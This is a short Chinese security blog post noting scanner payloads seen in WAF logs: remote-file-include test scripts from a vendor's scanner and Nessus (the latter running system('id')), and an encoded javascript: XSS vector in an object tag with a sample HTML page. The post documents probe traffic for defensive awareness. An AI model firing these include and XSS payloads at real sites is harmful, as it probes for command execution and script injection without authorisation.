Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

铱迅信息 PHP命令执行 Web扫描 远程部署的 payload

wpadmin~May 18, 2018 /InfoSec

说明

在 WAF 日志中找到的。

payload

# http://www.yxlink.com/nvs_test.txt
<?php
echo "vulnerability"." test";
?>

Nessus 的类似场景

# http://rfi.nessus.org/rfi.txt
<?php
 # NessusFileIncludeTest
 echo base64_decode("TmVzc3VzQ29kZUV4ZWNUZXN0")."\n\n";
 echo "'id' output: ";
 system("id");
?>

XSS

Server: Yxlink WAF
<object/data=javascrip&#x74:confirm(1)>
<object/data=javascrip%26%23x74:confirm(1)>

示例 html

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Page Title</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" type="text/css" media="screen" href="main.css" />
    <script src="main.js"></script>
</head>
<body>
    <object/data=javascrip&#x74:confirm(1)>
</body>
</html>

Leave a Reply

Your email address will not be published. Required fields are marked *